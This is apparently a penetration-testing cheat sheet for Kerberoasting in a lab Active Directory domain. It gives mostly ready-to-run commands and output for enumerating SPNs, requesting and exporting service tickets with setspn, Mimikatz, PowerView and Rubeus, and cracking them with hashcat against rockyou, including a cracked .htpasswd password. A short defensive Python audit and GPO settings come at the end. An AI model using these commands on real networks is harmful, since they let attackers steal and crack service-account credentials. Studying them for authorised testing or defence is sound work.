Windows - Kerberoasting
setspn.exe
Enumerating SPNs with setspn.exe
setspn.exe -Q */*
Targeting a Single User
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
Retrieving All Tickets Using setspn.exe
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
Note: We can also choose to retrieve all tickets using the same method, but this will also pull all computer accounts, so it is not optimal.
Mimikatz
Extracting Tickets from Memory with Mimikatz
Using 'mimikatz.log' for logfile : OK
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export
Preparing the Base64 Blob for Cracking
echo "<base64 blob>" | tr -d \\n
Placing the Output into a File as .kirbi
cat encoded_file | base64 -d > sqldev.kirbi
kirbi2john.py
https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py
Extracting the Kerberos Ticket using kirbi2john.py
python2.7 kirbi2john.py sqldev.kirbi
Hashcat
Modifying crack_file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
Cracking the Hash with Hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
hashcat --example-hashes
hashcat --example-hashes | grep apr1
Example:
┌──(19:55:31 eo㉿offsec)-[/usr/share/wordlists]
└─$ hashcat --example-hashes | grep apr1
Name................: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Example.Hash........: $apr1$62722340$zGjeAwVP2KwY6MtumUI1N/

--user
hashcat -m 1600 .htpasswd /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --user
Example:
┌──(20:03:47 eo㉿offsec)-[~/pgp/AuthBy]
└─$ hashcat -m 1600 .htpasswd /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --user
hashcat (v6.2.5) starting
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-11th Gen Intel(R) Core(TM) i7-1165G7 @ 2.80GHz, 2917/5899 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
* Passwords.: 100000
* Bytes.....: 781879
* Keyspace..: 100000
* Runtime...: 0 secs
$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
Time.Started.....: Wed Dec 7 20:04:04 2022 (0 secs)
Time.Estimated...: Wed Dec 7 20:04:04 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 20697 H/s (11.85ms) @ Accel:256 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5120/100000 (5.12%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 4096/100000 (4.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678q -> amateurs
Hardware.Mon.#1..: Util: 32%
Started: Wed Dec 7 20:03:50 2022
Stopped: Wed Dec 7 20:04:06 2022
Powerview
Using PowerView to Extract TGS Tickets
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Using PowerView to Target a Specific User
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Exporting All Tickets to a CSV File
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
Rubeus
.\Rubeus.exe
Using the /stats Flag
.\Rubeus.exe kerberoast /stats
Using the /nowrap Flag
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Using the /user Flag
.\Rubeus.exe kerberoast /user:testspn /nowrap
Using the /tgtdeleg Flag
.\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap
Note: When supplying the /tgtdeleg flag, the tool requested an RC4 ticket even though the supported encryption types are listed as AES 128/256. This does not work against a Windows Server 2019 Domain Controller.
Encryption Types
RC4
$krb5tgs$23$*
AES-256
$krb5tgs$18$*
AES-128
$krb5tgs$17$*
msDS-SupportedEncryptionTypes
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
Value 0 (0x0): Not defined - defaults to RC4_HMAC_MD5
Cracking the Ticket with Hashcat & rockyou.txt
hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt
Checking Supported Encryption Types
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
Requesting a New Ticket
.\Rubeus.exe kerberoast /user:testspn /nowrap
Running Hashcat & Checking the Status of the Cracking Job
hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt
Edit Encryption Types
Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
Network security: Configure encryption types allowed for Kerberos
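Added example (not code from the original page): decoding the msDS-SupportedEncryptionTypes bitmask returned by the Get-DomainUser query above and flagging SPN accounts that would still be issued RC4 tickets ($krb5tgs$23$), i.e. the accounts to fix with AES keys or the GPO setting above before an attacker gets to them. The flag bit values are the standard Windows ones; the account list is a constructed sample.

```python
# Added example, not from the original page: audit msDS-SupportedEncryptionTypes
# values (as returned by Get-DomainUser -Properties ...) and report SPN accounts
# whose TGS could be issued with RC4 (hashcat 13100) instead of AES (19600/19700).
# Bit meanings are the standard Windows flag values for this attribute.

RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10
ETYPE_BITS = {0x1: "DES_CBC_CRC", 0x2: "DES_CBC_MD5", RC4_HMAC: "RC4_HMAC_MD5",
              AES128: "AES128_CTS_HMAC_SHA1_96", AES256: "AES256_CTS_HMAC_SHA1_96"}

def decode_etypes(value):
    """Names of the encryption types enabled in the bitmask. A value of 0 (or a
    missing attribute) means 'not defined', which defaults to RC4_HMAC_MD5."""
    if not value:
        return ["RC4_HMAC_MD5 (attribute not set, default)"]
    return [name for bit, name in ETYPE_BITS.items() if value & bit]

def rc4_ticket_possible(value):
    """True if a TGS for this account can be issued with RC4 when a client asks
    for it: the attribute is unset, or the RC4 bit is still enabled."""
    return not value or bool(value & RC4_HMAC)

def audit(accounts):
    """accounts: (samaccountname, serviceprincipalname, msds-supportedencryptiontypes).
    Returns the SPN accounts a defender should remediate, with their decoded types."""
    findings = []
    for sam, spn, etypes in accounts:
        if spn and rc4_ticket_possible(etypes):
            findings.append((sam, decode_etypes(etypes)))
    return findings

# Constructed sample shaped like the Get-DomainUser output on this page (SPNs made up)
SAMPLE = [
    ("testspn", "testspn/kerberoast.inlanefreight.local", 0),           # unset -> RC4
    ("sqldev", "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433", 0x1C),  # RC4+AES128+AES256
    ("svc_aes", "HTTP/web.inlanefreight.local", 0x18),                  # AES only: fine
    ("jdoe", None, 0),                                                  # no SPN: not roastable
]

if __name__ == "__main__":
    for sam, etypes in audit(SAMPLE):
        print(f"{sam}: {', '.join(etypes)}")
```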